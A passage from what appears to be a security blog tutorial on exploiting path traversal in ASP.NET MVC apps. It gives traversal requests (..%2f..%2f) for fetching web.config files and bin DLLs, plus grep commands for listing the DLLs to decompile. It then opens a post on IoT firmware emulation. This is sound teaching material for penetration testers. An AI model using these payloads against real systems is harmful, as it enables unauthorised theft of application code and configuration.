<br /></div>
<div style="text-align: justify;">
Request:</div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">GET /download_page?id=<b>..%2f..%2fViews/web.config</b> HTTP/1.1</span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Host: example-mvc-application.minded</span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">[...]</span></div>
<div>
<br /></div>
<div>
Response:<br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">HTTP/1.1 200 OK</span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">[...]</span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><?xml version="1.0"?><br /><configuration></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> <configSections></span></div>
<div>
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><sectionGroup name="system.web.webPages.razor" <b>type</b>="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral"></span><br />
<span style="color: #c7254e;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><section name="host" </span></span><b style="background-color: #f9f2f4; font-family: "courier new", courier, monospace;">type</b><span style="background-color: #f9f2f4; font-family: "courier new" , "courier" , monospace;">="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" /></span></span><br />
<span style="color: #c7254e;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><section name="pages" </span></span><b style="background-color: #f9f2f4; font-family: "courier new", courier, monospace;">type</b><span style="background-color: #f9f2f4; font-family: "courier new" , "courier" , monospace;">="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" /></span></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> </sectionGroup></span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> </configSections><br /><system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" /><pages pageBaseType="System.Web.Mvc.WebViewPage"></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> <namespaces></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc.Ajax" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc.Html" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Optimization"/></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Routing" /></span><br />
<span style="color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b><i style="background-color: white;"> </i><i style="background-color: #f9f2f4;"><add namespace="WebApplication1" /></i></b></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> </namespaces></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></pages></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></system.web.webPages.razor><br /><appSettings><add key="webpages:Enabled" value="false" /></appSettings><br /><system.webServer><handlers><remove name="BlockViewHandler"/><add name="BlockViewHandler" path="*" verb="*" preCondition="integratedMode" type="System.Web.HttpNotFoundHandler" /></handlers></system.webServer><br /><system.web><compilation><assemblies><add assembly="System.Web.Mvc, Version=5.2.3.0, Culture=neutral” /></assemblies></compilation></system.web></configuration></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<h3>
Download the first DLL</h3>
<div style="text-align: justify;">
From a very shallow analysis, the declaration of a custom namespace (since other namespaces are defaults) suggests that a DLL called "WebApplication1" is present in the /bin directory.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Request:</div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">GET /download_page?id=<b>..%2f..%2fbin/WebApplication1.dll</b> HTTP/1.1</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Host: example-mvc-application.minded</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">[...]</span><br />
<br />
Response:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV1MjChhqW9OGvOoiTF3B_aM9rSN8FJDosSh2fwKMvrgsTDTnWXKimVvS5WknDxAufn2bLMsev2APDgYlkohUib8lwQVWsUx1h9WBYEhpvzD_23sHd2VlOjlUoNZmj9UoV6lq7STkJmezh/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="139" data-original-width="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV1MjChhqW9OGvOoiTF3B_aM9rSN8FJDosSh2fwKMvrgsTDTnWXKimVvS5WknDxAufn2bLMsev2APDgYlkohUib8lwQVWsUx1h9WBYEhpvzD_23sHd2VlOjlUoNZmj9UoV6lq7STkJmezh/s1600/3.png" /></a></div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br />
<br />
<br />
<br />
<br />
<br />
Therefore, the DLL file can be decompiled with tools like <a href="https://www.red-gate.com/products/dotnet-development/reflector/index" target="_blank">.NET Reflector</a>, in order to obtain the source code of the related part of the web application, and additional information to advance in the attack.<br />
<br /></div>
<div style="text-align: justify;">
Decompiling the main DLL shows several details about the internal structure of the application, and its dependencies and modules.</div>
<div style="text-align: justify;">
In fact, Area names, which are the semi-independent sections a MVC application is divided in, are defined in the binary of the main namespace / Web Application:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyOIhmzePG1CrWRoSaO705lmAhA4rwFKauyTE3Pq2-kgudvSULtLGOBBHdJs41WWNyovpTJ0InOzTKb2zNZycsi7FogDCdLUStUYRAc_SB5mt-LKTzHWFVrSrLZsmXLUcI4fkFuyLJOrBQ/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="527" data-original-width="849" height="395" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyOIhmzePG1CrWRoSaO705lmAhA4rwFKauyTE3Pq2-kgudvSULtLGOBBHdJs41WWNyovpTJ0InOzTKb2zNZycsi7FogDCdLUStUYRAc_SB5mt-LKTzHWFVrSrLZsmXLUcI4fkFuyLJOrBQ/s640/4.png" width="640" /></a></div>
<h4>
<br />Results</h4>
<ul>
<li style="text-align: justify;">The namespace <b>WebApplication1.Areas.Minded</b> corresponds to the namesake area, i.e. a section of the application which is most likely to be accessed with a path similar to <i><b>https://example-mvc-application.minded/area-name/</b></i>.</li>
<li style="text-align: justify;"><b>Routeconfig.cs</b> file has been extracted to understand the specific rules the application follows to translate URLs to Controllers (which can be considered as the web handlers of the application).</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Extend the attack surface</h3>
From the definition of an Area, an attacker can infer that other web.config files are present in the application, in guessable/default paths as /area-name/Views/, containing specific configurations that may refer to other DLL files present in the /bin folder.<br />
<br />
Request:<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">GET /download_page?id=<b>..%2f..%2fMinded/Views/web.config</b> HTTP/1.1</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Host: example-mvc-application.minded</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">[...]</span><br />
<br />
Response:<br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">HTTP/1.1 200 OK</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">[...]</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><?xml version="1.0"?></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><configuration></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><configSections></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><sectionGroup name="system.web.webPages.razor" </span><b style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new", courier, monospace;">type</b><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral"></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><section name="host" </span><b style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new", courier, monospace;">type</b><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><section name="pages" </span><b style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new", courier, monospace;">type</b><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral” requirePermission="false" /></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> </sectionGroup></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></configSections></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" /></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><pages pageBaseType="System.Web.Mvc.WebViewPage"></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><namespaces></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc.Ajax" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Mvc.Html" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Routing" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="System.Web.Optimization" /></span><br />
<span style="background-color: white; color: #c7254e; font-family: "courier new" , "courier" , monospace;"> </span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><add <b>namespace</b>="WebApplication1" /></span><br />
<span style="color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b><i style="background-color: white;"> </i><i style="background-color: #f9f2f4;"><add namespace="WebApplication1.AdditionalFeatures" /></i></b></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></namespaces></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></pages></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></system.web.webPages.razor></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><appSettings><add key="webpages:Enabled" value="false" /></appSettings></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><system.webServer><handlers><remove name="BlockViewHandler"/><add name="BlockViewHandler" path="*" verb="*" preCondition="integratedMode" type="System.Web.HttpNotFoundHandler" /></handlers></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></system.webServer></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></configuration></span><br />
<br />
<h4>
Attacker's loot so far</h4>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">C:\WebApplication1> dir /b /s web.config</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">C:\WebApplication1\Web.config</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">C:\WebApplication1\Views\Web.config</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">C:\WebApplication1\Areas\Minded\Views\web.config</span><br />
<br />
<div style="text-align: justify;">
All the web.config files have been downloaded, and they can be inspected for specific references, disclosing details on the /bin directory.</div>
<div style="text-align: justify;">
<br />
<h3>
Filename extraction cheat-sheet</h3>
<div>
The most relevant XML tags, an attacker should look to identify DLLs of a MVC application, are the declarations of namespaces, the inclusion of assembly files, ant any reference to types.</div>
<div>
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;">"namespace"</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">"assemblyIdentity"</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">" type="</span></li>
</ul>
<div>
<br /></div>
</div>
</div>
<h4>
Extract additional namespaces </h4>
<div>
Every web.config file, both for Areas and for the main Views configuration, includes references to any namespace it depends on:<br />
<br /></div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>$ grep -Ri namespace | grep -v namespaces | cut -d'"' -f 1-2</b></span><br />
<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc</span></b><br />Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc.Ajax</span></b>Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc.Html</span></b><br />Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4;"><span style="color: #c7254e;">System.Web.Routing</span></span></b><br />Areas/Minded/Views/web.config: <add namespace="<span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>System.Web.Optimization</b></span></span><br />Areas/Minded/Views/web.config: <add namespace="<b><span style="background-color: #f9f2f4;"><span style="color: #c7254e;">WebApplication1</span></span></b><br />Areas/Minded/Views/web.config: <add namespace="<span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>WebApplication1.AdditionalFeatures</b></span></span><br />Views/Web.config: <add namespace="<b><span style="background-color: #f9f2f4;"><span style="color: #c7254e;">System.Web.Mvc</span></span></b><br />Views/Web.config: <add namespace="<span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>System.Web.Mvc.Ajax</b></span></span><br />Views/Web.config: <add namespace="<span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>System.Web.Mvc.Html</b></span></span><br />Views/Web.config: <add namespace="<b><span style="background-color: #f9f2f4;"><span style="color: #c7254e;">System.Web.Optimization</span></span></b><br />Views/Web.config: <add namespace="<b><span style="background-color: #f9f2f4;"><span style="color: #c7254e;">System.Web.Routing</span></span></b><br />Views/Web.config: <add namespace="<span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>WebApplication1</b></span></span></span><br />
<br />
Extract additional assemblies that are referenced within the web application<br />
Binary files (Assembly) the application needs to work properly are declared in the main web.config file:<br />
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>$ grep -Ri assemblyidentity | cut -d'"' -f 1-2</b></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b><br /></b></span>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">Microsoft.Owin.Security</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b style="background-color: #f9f2f4;"><span style="color: #c7254e;">Microsoft.Owin.Security.OAuth</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">Microsoft.Owin.Security.Cookies</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">Microsoft.Owin</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">Newtonsoft.Json</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Optimization</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">WebGrease</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Helpers</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.Mvc</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Web.config: <assemblyIdentity name="</span><b><span style="background-color: #f9f2f4; color: #c7254e;">System.Web.WebPages</span></b></span><br />
<br />
<h4>
Extract section group’s namespaces</h4>
<div style="text-align: justify;">
Within the SectionGroup XML element of a web.config file, the rightmost value of the “type” attribute before the Version refers to additional namespaces the application may need:</div>
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>$ grep -ri " type=" | grep -v compiler | cut -d'"' -f 1-4</b></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b><br /></b></span>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Areas/Minded/Views/web.config: <sectionGroup name="system.web.webPages.razor" <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Areas/Minded/Views/web.config: <section name="host" <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.HostSection, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Areas/Minded/Views/web.config: <section name="pages" <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.RazorPagesSection, <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Areas/Minded/Views/web.config: <add name="BlockViewHandler" path="*</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Views/Web.config: <sectionGroup name="system.web.webPages.razor" <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Views/Web.config: <section name="host" <span style="color: #c7254e;"><span style="background-color: #f9f2f4;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.HostSection, <span style="color: #c7254e;"><span style="background-color: #f9f2f4;">S<b>ystem.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Views/Web.config: <section name="pages" <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>type</b></span></span>="System.Web.WebPages.Razor.Configuration.RazorPagesSection, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>System.Web.WebPages.Razor</b></span></span>, Version=3.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Views/Web.config: <add name="BlockViewHandler" path="*</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Web.config: <section name="entityFramework" <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>type</b></span></span>="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>EntityFramework</b></span></span>, Version=6.0.0.0, Culture=neutral</span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Web.config: <defaultConnectionFactory <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>type</b></span></span>="System.Data.Entity.Infrastructure.LocalDbConnectionFactory, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>EntityFramework</b></span></span>"></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">Web.config: <provider invariantName="System.Data.SqlClient" <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>type</b></span></span>="System.Data.Entity.SqlServer.SqlProviderServices, <span style="background-color: #f9f2f4;"><span style="color: #c7254e;"><b>EntityFramework.SqlServer</b></span></span></span><br />
<br />
Thus, several files can be downloaded: <br />
<br />
<ul>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwndEXx1W_9vmjTStwLXwA-jBg5JhKpZrYhlK8T_bUb5julOvhK2pXnLaSe-RYbmrWqTLBm-W5BUly8xHn5_zqcl9s_a-RE-T2LqROIrkkggVDHKSYPxb8I7iaCeh3bDDBBpyistXRnjzf/s1600/6.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="682" data-original-width="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwndEXx1W_9vmjTStwLXwA-jBg5JhKpZrYhlK8T_bUb5julOvhK2pXnLaSe-RYbmrWqTLBm-W5BUly8xHn5_zqcl9s_a-RE-T2LqROIrkkggVDHKSYPxb8I7iaCeh3bDDBBpyistXRnjzf/s1600/6.png" /></a>
<li>EntityFramework.dll</li>
<li>EntityFramework.SqlServer.dll</li>
<li>Microsoft.Owin.dll</li>
<li>Microsoft.Owin.Security.dll</li>
<li>Microsoft.Owin.Security.Cookies.dll</li>
<li>Microsoft.Owin.Security.OAuth.dll</li>
<li>Newtonsoft.Json.dll</li>
<li>System.Web.Helpers.dll</li>
<li>System.Web.Mvc.dll</li>
<li>System.Web.Mvc.Ajax.dll</li>
<li>System.Web.Mvc.Html.dll</li>
<li>System.Web.Optimization.dll</li>
<li>System.Web.Routing.dll</li>
<li>System.Web.WebPages.dll</li>
<li>System.Web.WebPages.Razor.dll</li>
<li>WebApplication1.dll</li>
<li><b>WebApplication1.AdditionalFeatures.dll</b></li>
<li>WebGrease.dll</li>
</ul>
<br />
Example of request:<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">GET /download_page?id=..%2f..%2fbin/<DLL NAME>.dll HTTP/1.1</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Host: example-mvc-application.minded</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[...]</span><br />
<br />
<div style="text-align: justify;">
<div style="text-align: justify;">
For the sake of completeness, it must be said that these steps allow an attacker to initiate a grey-box analysis against the web application. In fact, the /bin folder of the target application itself includes several additional DLLs which are referenced by inner libraries.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To understand the gap between the actual /bin folder content and the result of the described technique, the picture shows the real content of the folder, from the internal perspective.</div>
<br />
<div style="text-align: justify;">
Besides, downloaded DLL files can be treated as any other DLL, which means their dependencies can be listed and they can be decompiled, to investigate more deeply.</div>
<br />
<br />
<h3>
References</h3>
<ul>
<li>https://msdn.microsoft.com/en-us/library/w7w4sb0w.aspx</li>
<li>https://docs.microsoft.com/it-it/aspnet/core/mvc/controllers/areas?view=aspnetcore-2.1</li>
<li>https://www.infragistics.com/community/blogs/b/dhananjay_kumar/posts/areas-in-asp-net-mvc</li>
<li>https://www.red-gate.com/products/dotnet-development/reflector/index</li>
<li>https://visualstudiomagazine.com/articles/2014/10/28/asp-net-mvc-5-1-new.aspx</li>
<li>https://www.davidhayden.me/blog/asp-net-mvc-5-attribute-routing</li>
<li>https://www.c-sharpcorner.com/article/learn-about-razor-view-engine/</li>
<li>https://www.ecanarys.com/Blogs/ArticleID/271/THE-RAZOR-VIEW-ENGINE-IN-MVC</li>
</ul>
</div>
</div>
Fabrizio Buglihttp://www.blogger.com/profile/02917760476807817801noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-51586597194707912922018-10-02T07:31:00.000-07:002018-10-02T07:32:07.913-07:00Pentesting IoT devices (Part 2: Dynamic Analysis)<div>
<h3>
</h3>
<div>
<div style="text-align: justify;">
This is the second part of our Pentesting IoT devices guide. In the <a href="https://blog.mindedsecurity.com/2018/09/a-practical-guide-to-testing-security.html" target="_blank">previous post</a> it was provided an overview on firmware static analysis showing how it can help to find many security issues. In this article it will be discussed the so called dynamic approach for device pentesting. It will be described how it is possible, thanks to firmware emulation, to improve pentesters' skills and test devices without physically have them.<br />
<div>
<br /></div>
</div>
</div>
<h3>
</h3>
<h3>
Dynamic Analysis</h3>
</div>
<div>
<div style="text-align: justify;">
The dynamic test of a device, from a security perspective, includes different activities and for each of them there is a specific testing methodology. For example, after a preliminary recon phase against a device, it is possible to face different services like a web server, an FTP service and even an unknown open port related to a customized communication protocol. In this case it is important to split test scenarios and apply a different methodology for each class of services. A great approach could be to test the web interface looking for the typical web vulnerabilities, then focusing on the FTP service and, in the end, studying the customized protocol by sniffing the device traffic or by fuzzing it.<br />
The <a href="https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Attack_Surface_Areas">OWASP IoT attack surface areas</a> provides a useful checklist that helps pentesters in focusing and prioritizing their analysis.<br />
<br />
Since it is not possible to describe all the dynamic analysis that a tester could perform against a device, this article focuses the attention on showing an effective way to emulate an IoT device.<br />
<br />
<h3 style="text-align: start;">
Firmware Emulation</h3>
The possibility to emulate a device starting from its firmware allows researchers to perform any kind of dynamic tests against it without having the physical device and without worrying about a possible brick. Actually, this kind of analysis are very effective in consultancy activities because sometimes it is necessary to work under particular circumstances, for example, when it is not allowed to test the real device because it's a production device or it is impossible to get the physical device because it is installed in an unreachable place but, in any case, a device firmware copy and a suitable emulator are provided. The main limitation of this technique is that <b>not all devices firmwares and architectures can be easily emulated</b>.<br />
<br /></div>
</div>
<div>
<h4>
Firmadyne</h4>
</div>
<div>
<div style="text-align: justify;">
